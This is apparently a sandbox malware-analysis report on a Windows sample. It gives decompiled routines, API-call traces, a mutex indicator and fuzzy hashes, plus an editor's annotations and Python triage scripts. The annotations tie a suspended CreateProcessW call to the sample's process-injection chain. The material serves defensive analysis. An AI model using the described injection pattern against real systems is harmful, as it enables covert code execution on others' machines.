
                  C-Code - Quality: 79%
                  			// Editor's annotation, not part of the report: this is the module's
                  			// shutdown path. It drains the chain of exit callbacks anchored at
                  			// 0x1000f034, unloads a secondary module with FreeLibrary when that
                  			// handle is neither the image's own base (0x10000000 in this dump) nor
                  			// NULL, calls an optional exit hook at 0x1000f018, and terminates with
                  			// ExitProcess using the exit code kept at 0x1000e000 (0 at dump time).
                  			// The shape is that of the Delphi RTL's Halt0/ExitProc sequence; that
                  			// identification is the editor's reading of the code, not a statement
                  			// of the report.
                  			E10003150() {
                  				intOrPtr* _t13;
                  				struct HINSTANCE__* _t27;
                  				void* _t36;
                  				intOrPtr _t39;
                  				void* _t52;
                  
                  				// Decompiler artefact of a misaligned entry (_t13 is never assigned);
                  				// E10003154 below is the same routine without it.
                  				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
                  				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
                  					L5:
                  					if( *0x1000e004 != 0) {
                  						E10003040();
                  						E100030CC(_t36);
                  						 *0x1000e004 = 0;
                  					}
                  					L7:
                  					if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
                  						 *0x1000F630 = 0;
                  					}
                  					E10002F24(); // executed
                  					if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
                  						_t17 =  *0x1000F634;
                  						if( *0x1000F634 != 0) {
                  							E1000466C(_t17);
                  							_t39 =  *((intOrPtr*)(0x1000f634));
                  							_t7 = _t39 + 0x10; // 0x0
                  							_t27 =  *_t7;
                  							_t8 = _t39 + 4; // 0x10000000
                  							// Only unload a handle that is neither the image itself nor NULL.
                  							if(_t27 !=  *_t8 && _t27 != 0) {
                  								FreeLibrary(_t27);
                  							}
                  						}
                  					}
                  					E10002EFC();
                  					if( *((char*)(0x1000f64c)) == 1) {
                  						 *0x1000F648();
                  					}
                  					if( *((char*)(0x1000f64c)) != 0) {
                  						E1000309C();
                  					}
                  					// No outer context record left (0x1000f624 == 0): run the optional
                  					// exit hook and end the process with the stored exit code.
                  					if( *0x1000f624 == 0) {
                  						if( *0x1000f018 != 0) {
                  							 *0x1000f018();
                  						}
                  						ExitProcess( *0x1000e000); // executed
                  					}
                  					// Otherwise copy the outer record (11 dwords) over this one and repeat.
                  					memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
                  					_t52 = _t52 + 0xc;
                  					0x1000e000 = 0x1000e000;   // no-op emitted by the decompiler
                  					goto L7;
                  				} else {
                  					// Exit-procedure chain: clear the head, call the callback it held,
                  					// and repeat until a callback leaves the head empty.
                  					do {
                  						 *0x1000f034 = 0;
                  						 *((intOrPtr*)( *0x1000f034))();
                  					} while ( *0x1000f034 != 0);
                  					goto L5;
                  				}
                  			}









                  APIs
                  • FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: 0eb6f4655f148300ca2f24b40a13f7269e70753ec68d107d5bfe6d84152a04b1
                  • Instruction ID: fe416cb812802e2425b92288dcf65fb30cec29a5b1ace6356a2caf233bfd9b77
                  • Opcode Fuzzy Hash: 0eb6f4655f148300ca2f24b40a13f7269e70753ec68d107d5bfe6d84152a04b1
                  • Instruction Fuzzy Hash: CA2157B49002819AFB52DB60C4887927BE9EF093D0F26C9A9D8448A18ED774DCC4CB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 79%
                  			// Editor's annotation: the same shutdown routine as E10003150 above,
                  			// decompiled from the entry four bytes later, so it lacks the artefact
                  			// line at the top and is otherwise identical (same FreeLibrary and
                  			// ExitProcess call sites at 0x100031DD and 0x10003212).
                  			E10003154() {
                  				struct HINSTANCE__* _t26;
                  				void* _t35;
                  				intOrPtr _t38;
                  				void* _t51;
                  
                  				if( *0x1000F64C != 0 ||  *0x1000f034 == 0) {
                  					L4:
                  					if( *0x1000e004 != 0) {
                  						E10003040();
                  						E100030CC(_t35);
                  						 *0x1000e004 = 0;
                  					}
                  					L6:
                  					if( *((char*)(0x1000f64c)) == 2 &&  *0x1000e000 == 0) {
                  						 *0x1000F630 = 0;
                  					}
                  					E10002F24(); // executed
                  					if( *((char*)(0x1000f64c)) <= 1 ||  *0x1000e000 != 0) {
                  						_t16 =  *0x1000F634;
                  						if( *0x1000F634 != 0) {
                  							E1000466C(_t16);
                  							_t38 =  *((intOrPtr*)(0x1000f634));
                  							_t7 = _t38 + 0x10; // 0x0
                  							_t26 =  *_t7;
                  							_t8 = _t38 + 4; // 0x10000000
                  							if(_t26 !=  *_t8 && _t26 != 0) {
                  								FreeLibrary(_t26);
                  							}
                  						}
                  					}
                  					E10002EFC();
                  					if( *((char*)(0x1000f64c)) == 1) {
                  						 *0x1000F648();
                  					}
                  					if( *((char*)(0x1000f64c)) != 0) {
                  						E1000309C();
                  					}
                  					if( *0x1000f624 == 0) {
                  						if( *0x1000f018 != 0) {
                  							 *0x1000f018();
                  						}
                  						ExitProcess( *0x1000e000); // executed
                  					}
                  					memcpy(0x1000f624,  *0x1000f624, 0xb << 2);
                  					_t51 = _t51 + 0xc;
                  					0x1000e000 = 0x1000e000;
                  					goto L6;
                  				} else {
                  					do {
                  						 *0x1000f034 = 0;
                  						 *((intOrPtr*)( *0x1000f034))();
                  					} while ( *0x1000f034 != 0);
                  					goto L4;
                  				}
                  			}








                  APIs
                  • FreeLibrary.KERNEL32(10000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 100031DD
                  • ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: ExitFreeLibraryProcess
                  • String ID:
                  • API String ID: 1404682716-0
                  • Opcode ID: f029aa4d048ab71b3d48e2163f45d484fdec98b6e81d7e04a45f41dc6beeb9e9
                  • Instruction ID: 0923f5ad4ec0768f18e91c29f3e5e862ef011e1a732e010652329f9221a0f365
                  • Opcode Fuzzy Hash: f029aa4d048ab71b3d48e2163f45d484fdec98b6e81d7e04a45f41dc6beeb9e9
                  • Instruction Fuzzy Hash: D7215BB49002819BFB52DF60C4887967BEDEF093D0F22C569D8448618ED775DCC4CB52
                  Uniqueness

                  Uniqueness Score: -1.00%
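The Similarity fields are what tie E10003150, E10003154 and the entry before them together: the same API ID (ExitFreeLibraryProcess) and Instruction Fuzzy Hashes that differ in only a handful of nibbles. The Python below is an added example by the editor, not the vendor's similarity code, that quantifies this by positional nibble agreement and groups entries above a threshold. It assumes the hash is position-aligned (the four values on this page have the same length and visibly line up); the vendor's construction is not documented here, so treat the score as a triage aid rather than the report's own metric. The hash values are copied from this section.

```python
"""Cluster function entries by positional agreement of their Instruction
Fuzzy Hash.  Added example by the editor, not the vendor's similarity code.
Assumption: the hash is position-aligned, so nibble-wise agreement is a
usable proxy for similarity.  Hash values are copied from this report."""
from typing import Dict, List


def nibble_similarity(a: str, b: str) -> float:
    """Fraction of hex positions at which the two digests agree."""
    a, b = a.upper(), b.upper()
    if len(a) != len(b):
        raise ValueError("digests of different length cannot be aligned")
    return sum(x == y for x, y in zip(a, b)) / len(a)


def cluster_by_similarity(hashes: Dict[str, str], threshold: float) -> List[List[str]]:
    """Single-linkage grouping with union-find: two entries share a cluster
    when a chain of pairs, each at least `threshold` similar, connects them."""
    names = list(hashes)
    parent = {n: n for n in names}

    def find(n: str) -> str:
        while parent[n] != n:
            parent[n] = parent[parent[n]]   # path halving
            n = parent[n]
        return n

    for i, x in enumerate(names):
        for y in names[i + 1:]:
            if nibble_similarity(hashes[x], hashes[y]) >= threshold:
                parent[find(x)] = find(y)
    groups: Dict[str, List[str]] = {}
    for n in names:
        groups.setdefault(find(n), []).append(n)
    # Largest cluster first, then by first member name, for stable output.
    return sorted(groups.values(), key=lambda g: (-len(g), g[0]))


# Instruction Fuzzy Hash values copied from this report section.
HASHES = {
    "preceding entry (opcode ID a7d26fcc...)":
        "132148B49002819BFB52DB64C48879677EDEB093D0F26C569D8448B18ED775DCC4C791",
    "E10003150":
        "CA2157B49002819AFB52DB60C4887927BE9EF093D0F26C9A9D8448A18ED774DCC4CB52",
    "E10003154":
        "D7215BB49002819BFB52DF60C4887967BEDEF093D0F22C569D8448618ED775DCC4CB52",
    "E10009950":
        "05F089B63843442BF330D694DC86FEB739CEB84790F110539BB88DA1C1DAB5A91583B6",
}

if __name__ == "__main__":
    for group in cluster_by_similarity(HASHES, 0.6):
        print(group)
```

With a 0.6 threshold the three shutdown entries land in one cluster at roughly 0.75 to 0.83 agreement, while E10009950 stays alone below 0.25; a practitioner comparing reports for related samples can run the same pass over every entry's hash to collapse the listing to distinct routines.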

                  C-Code - Quality: 86%
                  			// Editor's annotation, not part of the report: starts a child process
                  			// from a caller-supplied wide-character command line and returns its
                  			// process handle. dwCreationFlags (sixth argument) is 4, CREATE_SUSPENDED,
                  			// so the child is created with its primary thread suspended and does not
                  			// run its own entry point before the caller holds the handle. Read with
                  			// the report's signatures ("Injects a PE file into a foreign processes",
                  			// "Writes to foreign memory regions", "Creates a thread in another
                  			// existing process"), this is the first step of the injection chain.
                  			E10009950(void* __eax) {
                  				struct _STARTUPINFOW _v80;
                  				struct _PROCESS_INFORMATION _v96;
                  				short _v620;   // local copy of the command line (see memcpy below)
                  				int _t14;
                  				void* _t16;
                  				void* _t24;
                  
                  				// 0x82 dwords (520 bytes) plus one movsw: 522 bytes = 261 WCHARs,
                  				// MAX_PATH plus terminator, copied from the caller's buffer.
                  				memcpy(_t24, __eax, 0x82 << 2);
                  				asm("movsw");
                  				_t16 = 0;                      // return NULL unless creation succeeds
                  				E100050D8();                   // helper not shown on this page
                  				// lpApplicationName = NULL, lpCommandLine = _v620, no handle
                  				// inheritance, dwCreationFlags = 4 (CREATE_SUSPENDED), default
                  				// environment and working directory.
                  				_t14 = CreateProcessW(0,  &_v620, 0, 0, 0, 4, 0, 0,  &_v80,  &_v96); // executed
                  				if(_t14 != 0) {
                  					_t16 = _v96.hProcess;     // hand back the suspended child's handle
                  					Sleep(0x64); // executed; 100 ms pause before the caller continues
                  				}
                  				return _t16;
                  			}










                  APIs
                  • CreateProcessW.KERNEL32 ref: 1000999D
                  • Sleep.KERNEL32(00000064,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,1000F834,1000F834,00000000,1000D68D,00000000), ref: 100099AF
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: CreateProcessSleep
                  • String ID:
                  • API String ID: 3229676899-0
                  • Opcode ID: bca0b144e135752a1d5e6e13312447c91aa1364c1872f8c890ab86c12d918bbf
                  • Instruction ID: 37df1048d1a9e356d2120e553cad0eb1a5fc8c22ebf76e4491bd2cded27ec310
                  • Opcode Fuzzy Hash: bca0b144e135752a1d5e6e13312447c91aa1364c1872f8c890ab86c12d918bbf
                  • Instruction Fuzzy Hash: 05F089B63843442BF330D694DC86FEB739CEB84790F110539BB88DA1C1DAB5A91583B6
                  Uniqueness

                  Uniqueness Score: -1.00%
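The two API lines above and the decompiled CreateProcessW call carry the detail that matters for the injection chain: the sixth argument is 4, CREATE_SUSPENDED, and the sandbox's own API lines elsewhere in this section expose the mutex name and sleep interval. The Python below is an added example by the editor, not code from the report, the vendor or the sample. It parses API lines in the report's `• Name.MODULE(args), ref: ADDR` format, reads dwCreationFlags out of a decompiled call statement and names its bits, and pulls the mutex name, sleep interval and any file path out of the API lines as indicators. The input lines are copied from this section; the flag table holds the documented Win32 CreateProcess constants (priority-class and WOW bits omitted).

```python
"""Parse Joe Sandbox "APIs" lines and decode CreateProcessW creation flags.

Added example by the editor; not part of the sandbox report or the sample.
The sample lines below are copied from this report section."""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One API line: "• Name.MODULE(arg,arg,...), ref: ADDR".  The argument list is
# optional; the report prints "CreateProcessW.KERNEL32 ref: 1000999D" without one.
_API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Call statement as the decompiler prints it: CreateProcessW(a, b, ..., j)
_CREATE_CALL = re.compile(r"CreateProcessW\s*\((?P<args>[^)]*)\)")

# Documented dwCreationFlags bits (winbase.h); partial table, see lead-in.
CREATION_FLAGS: Dict[int, str] = {
    0x00000001: "DEBUG_PROCESS",
    0x00000002: "DEBUG_ONLY_THIS_PROCESS",
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x00000200: "CREATE_NEW_PROCESS_GROUP",
    0x00000400: "CREATE_UNICODE_ENVIRONMENT",
    0x00080000: "EXTENDED_STARTUPINFO_PRESENT",
    0x01000000: "CREATE_BREAKAWAY_FROM_JOB",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]   # raw argument tokens as printed ("?" for unknown)
    ref: int          # address of the call site


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return the call described by one report line, or None for other text."""
    m = _API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def creation_flags_from_call(c_line: str) -> int:
    """dwCreationFlags is the sixth parameter of CreateProcessW."""
    m = _CREATE_CALL.search(c_line)
    if not m:
        raise ValueError("no CreateProcessW call in line")
    args = [a.strip() for a in m.group("args").split(",")]
    return int(args[5], 0)          # accepts "4" as well as "0x4"


def decode_creation_flags(value: int) -> List[str]:
    """Names of the set bits; any bits outside the table are kept as hex."""
    names = [n for bit, n in CREATION_FLAGS.items() if value & bit]
    rest = value & ~sum(CREATION_FLAGS)
    if rest:
        names.append(f"0x{rest:08x}")
    return names


def extract_indicators(lines: List[str]) -> Dict[str, List]:
    """Pull hunting-relevant values out of the API lines."""
    out: Dict[str, List] = {"mutex_names": [], "sleep_ms": [], "paths": []}
    for call in filter(None, map(parse_api_line, lines)):
        if call.name == "CreateMutexW" and call.args:
            out["mutex_names"].append(call.args[-1])        # lpName is the last parameter
        elif call.name == "Sleep" and call.args:
            out["sleep_ms"].append(int(call.args[0], 16))   # the report prints hex
        out["paths"].extend(a for a in call.args if re.match(r"^[A-Za-z]:\\", a))
    out["paths"] = sorted(set(out["paths"]))
    return out


# Lines copied from this report section.
REPORT_LINES = [
    r"• CreateProcessW.KERNEL32 ref: 1000999D",
    r"• Sleep.KERNEL32(00000064,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,1000F834,1000F834,00000000,1000D68D,00000000), ref: 100099AF",
    r"• CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06",
    r"• ExitProcess.KERNEL32(00000000,?,?,?,00000002,1000323A,1000259B,100025E3,00000002,00000000,10002538,?,1000D702,00000000,C:\Users\user\Desktop\7FW4ce2RDy.exe,0000020A), ref: 10003212",
]
DECOMPILED_CALL = "_t14 = CreateProcessW(0,  &_v620, 0, 0, 0, 4, 0, 0,  &_v80,  &_v96); // executed"

if __name__ == "__main__":
    flags = creation_flags_from_call(DECOMPILED_CALL)
    print("dwCreationFlags =", hex(flags), decode_creation_flags(flags))
    print(extract_indicators(REPORT_LINES))
```

The trailing tokens of an API line are stack residue, which is why the sample's own path surfaces in the ExitProcess line; the path and mutex extraction above relies on that and should be read as a convenience for triage, not as a parse of the call's real parameters.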

                  C-Code - Quality: 75%
                  			// Editor's annotation: teardown helper. L10004E28 is the import thunk
                  			// that the API list resolves to RtlDeleteCriticalSection; it receives
                  			// the critical section at 0x1000f7f4, after which the handle stored at
                  			// 0x1000f7f0 (0x204 in this run) is closed.
                  			E1000A2F4() {
                  				void* _t1;
                  				int _t2;
                  
                  				_push(0x1000f7f4);
                  				L10004E28();                   // RtlDeleteCriticalSection(0x1000f7f4)
                  				_t1 =  *0x1000f7f0; // 0x204    handle value observed at dump time
                  				_t2 = CloseHandle(_t1); // executed
                  				return _t2;
                  			}






                  APIs
                  • RtlDeleteCriticalSection.KERNEL32(1000F7F4,1000A4BE,00000000,1000A4CC), ref: 1000A2F9
                  • CloseHandle.KERNEL32(00000204,1000F7F4,1000A4BE,00000000,1000A4CC), ref: 1000A304
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: CloseCriticalDeleteHandleSection
                  • String ID:
                  • API String ID: 1370521891-0
                  • Opcode ID: 269cd16a933fb2f2a05e7184a288945c7f1de7f8f90c06772876b0a288ff3f32
                  • Instruction ID: 60a53012df9d074323565359c769d0ac364e4643a7c8a37a3e2d445cc00f5d91
                  • Opcode Fuzzy Hash: 269cd16a933fb2f2a05e7184a288945c7f1de7f8f90c06772876b0a288ff3f32
                  • Instruction Fuzzy Hash: 1FA0129940400247F500E7E0DC818692108F7042C13D2051871044250ECD146004532A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysFreeString.OLEAUT32(?), ref: 1000379B
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: FreeString
                  • String ID:
                  • API String ID: 3341692771-0
                  • Opcode ID: 04672e0b375c637b80715d6dceb747e02594dde89952f183c9eab0147d6330a5
                  • Instruction ID: c2b807945fbd858067c7052735d838f70a134ef64bf736acf42af14dc62dc520
                  • Opcode Fuzzy Hash: 04672e0b375c637b80715d6dceb747e02594dde89952f183c9eab0147d6330a5
                  • Instruction Fuzzy Hash: 64C012F66506200BFB62CBA99CC0B8763CCDB892E5F1541A1A518DB208E660AC0086A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • CreateMutexW.KERNEL32(?,?,?,?,1000D54A,00000000,00000000,HgDdsuTd), ref: 10004E06
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: CreateMutex
                  • String ID:
                  • API String ID: 1964310414-0
                  • Opcode ID: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                  • Instruction ID: 5a3873c4f99191ebd0c5874248a48e85116967648e1c4cce01420d804b7247f1
                  • Opcode Fuzzy Hash: 21e0619b74412fae9514185c35c6bd95fbb7b52f213a822672066e7264c0ded7
                  • Instruction Fuzzy Hash: 20C012B71A024CAB8B00EEA9CC06D9B33DCAB28609B008825B928CB100C539E5909B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • GetFileAttributesW.KERNEL32(00000000,100056A6,1000F834,1000F834,?,1000D2F8,00000002,?,80000001,00000000,00008007,00000000,1000D759), ref: 10005679
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: fe0dc61edb0e7cc40dd00668538b564961092fac01b342148f47dbe8c26fd250
                  • Instruction ID: ea5e7307e224a2362f62b937032a713fdd445899dab5aa11519bd1f809b1bc4b
                  • Opcode Fuzzy Hash: fe0dc61edb0e7cc40dd00668538b564961092fac01b342148f47dbe8c26fd250
                  • Instruction Fuzzy Hash: 7AB012A88012410C7D40D175080506B31C4EB911F7BE71F81E874C34DDDF17940B2820
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 1000374F
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: AllocString
                  • String ID:
                  • API String ID: 2525500382-0
                  • Opcode ID: 9d9605649b70b0fa5bc313e52292162510b87c7f1e5ee76dc899ddc6011781d1
                  • Instruction ID: 594f7db3346f59ee2b746a14ae0536c80aa61ded5ebc518595aa97b66a28efc9
                  • Opcode Fuzzy Hash: 9d9605649b70b0fa5bc313e52292162510b87c7f1e5ee76dc899ddc6011781d1
                  • Instruction Fuzzy Hash: A9B012F820C70310FEAAD1210D517B703CCCB004C3F825014EF08C40CDDA50D8025031
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d65215945d9a2a64676ffa77a597c81c9f24c7e28e3e4c58e5623c55a8f50257
                  • Instruction ID: afd740ba37e0bc33af22663b88102fad2f1614a21055034617254271def5a9b3
                  • Opcode Fuzzy Hash: d65215945d9a2a64676ffa77a597c81c9f24c7e28e3e4c58e5623c55a8f50257
                  • Instruction Fuzzy Hash: 3EF08231308B076FB711DE4BAD90922F7FDFB996E035185BAE90893A18DB21F810C560
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Similarity
                  • API ID: Malloc
                  • String ID:
                  • API String ID: 2696272793-0
                  • Opcode ID: e494b0dbbd17313aec99b6fdc899f248a05a96dc61f52493615a425915e08986
                  • Instruction ID: 2b23affcbc4175e08e38b0563d1324aa0b8922ef3a41ef4a7c7d2d78b35e8f64
                  • Opcode Fuzzy Hash: e494b0dbbd17313aec99b6fdc899f248a05a96dc61f52493615a425915e08986
                  • Instruction Fuzzy Hash: 06A0029574220407EB50D9FE98C174782CBA78D351FB04079710DC734BD955AC562136
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  C-Code - Quality: 67%
                  			// Editor's annotation, not part of the report: a window procedure
                  			// (arguments hwnd, message, wParam, lParam). It is listed under
                  			// "Non-executed Functions", so the sandbox did not see it run in this
                  			// session. The message id is compared against values kept at
                  			// 0x1000f68c..0x1000f6a0 (0xC1B9..0xC1BE at dump time, one slot still 0;
                  			// the 0xC000-0xFFFF range is what RegisterWindowMessage returns) and
                  			// against 0x308, WM_DRAWCLIPBOARD. Anything else is passed on to
                  			// L10004FE0 with the same four arguments, the position in which a window
                  			// procedure calls DefWindowProc; the page does not name that import, so
                  			// that identification is an assumption.
                  			E10008568(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
                  				intOrPtr _v8;
                  				void* _v12;
                  				char _v16;
                  				long _v24;
                  				long _v28;
                  				long _v32;
                  				char _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				char _v300;
                  				intOrPtr _v304;
                  				char _v308;
                  				char _v312;
                  				char _v316;
                  				char _v320;
                  				char _v324;
                  				char _v328;
                  				char _v332;
                  				char _v336;
                  				char _v340;
                  				char _v344;
                  				char _v348;
                  				char _v352;
                  				char _v356;
                  				char _v360;
                  				char _v364;
                  				char _v368;
                  				char _v372;
                  				char _v376;
                  				char _v380;
                  				char _v384;
                  				intOrPtr _t100;
                  				intOrPtr _t101;
                  				void* _t109;
                  				void* _t111;
                  				void* _t121;
                  				intOrPtr _t133;
                  				long _t149;
                  				void* _t151;
                  				intOrPtr _t153;
                  				struct HHOOK__* _t158;
                  				struct HHOOK__* _t161;
                  				long _t191;
                  				void* _t194;
                  				void* _t196;
                  				long _t197;
                  				void* _t205;
                  				void* _t207;
                  				struct HHOOK__* _t209;
                  				intOrPtr _t228;
                  				void* _t244;
                  				void* _t247;
                  				intOrPtr _t256;
                  				void* _t265;
                  				void* _t266;
                  				void* _t267;
                  				void* _t268;
                  				intOrPtr _t271;
                  				intOrPtr _t282;
                  				intOrPtr _t289;
                  				intOrPtr _t301;
                  				intOrPtr _t302;
                  				intOrPtr _t303;
                  				void* _t328;
